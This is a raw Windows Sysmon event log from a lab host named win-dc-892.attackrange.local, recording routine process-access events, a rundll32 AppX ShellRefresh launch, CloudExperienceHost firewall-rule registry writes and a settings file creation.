12:02:16.230{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004890Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.230{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004889Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.230{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004888Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.230{266CAFBE-64C6-6064-A900-00000000AE01}34043024C:\Windows\system32\svchost.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\System32\AppXDeploymentExtensions.desktop.dll+21b54|C:\Windows\System32\AppXDeploymentExtensions.desktop.dll+2a21d|c:\windows\system32\appxdeploymentserver.dll+157ebf|c:\windows\system32\appxdeploymentserver.dll+ae504|c:\windows\system32\appxdeploymentserver.dll+92924|c:\windows\system32\appxdeploymentserver.dll+19e0c|c:\windows\system32\appxdeploymentserver.dll+2bffd|c:\windows\system32\appxdeploymentserver.dll+2bdf9|C:\Windows\SYSTEM32\ntdll.dll+80974|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004887Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.233{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXErundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefreshC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx 13241300x80000000000000004886Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:16.215{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773S-1-5-21-4055678433-3894535204-3898404691-500v2.26|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|C=S-1-15-3-1|C=S-1-15-3-3|C=S-1-15-3-787448254-1207972858-3558633622-1059886964|C=S-1-15-3-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|B=C:\Windows\system32\wwahost.exe|M=microsoft.windows.cloudexperiencehost_cw5n1h2txyewy|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|D=C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\|PFN=Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy| 13241300x80000000000000004885Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:16.215{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{CF587D09-6019-4820-AD86-AA38CA29C8DE}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Platform=2:6:2|Platform2=GTEQ| 13241300x80000000000000004884Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:16.215{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{A1AE94CE-6A7D-4595-AE10-42357FE58954}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Platform=2:6:2|Platform2=GTEQ| 13241300x80000000000000004883Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:16.215{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{A3F80EC4-1762-4474-8A4B-4AD1FC4BDD0B}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 13241300x80000000000000004882Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:16.215{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{38D80225-2FD4-428D-A8CD-11F44F0F9FC0}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Security=Authenticate| 13241300x80000000000000004881Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:16.199{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{F115ABF0-50AF-4365-A9FF-E7E52A7CF0CA}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Security=Authenticate| 13241300x80000000000000004880Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:16.199{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{959FD32D-F84A-4D4B-A729-B73FB5AA9657}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 13241300x80000000000000004879Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:16.199{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{4047441B-1230-46F6-9DA3-074966D014EE}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 13241300x80000000000000004878Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:16.199{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{0B7622EE-3676-45E4-8291-E27B4958787B}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 13241300x80000000000000004877Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:16.199{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{182661CB-5248-4E67-95A5-2F771A4844F7}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 11241100x80000000000000004876Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.199{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:16.199 23542300x80000000000000004875Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.184{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004874Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.168{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004873Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.168{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004872Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.168{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004871Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.168{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004870Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004869Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004868Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004867Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004866Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 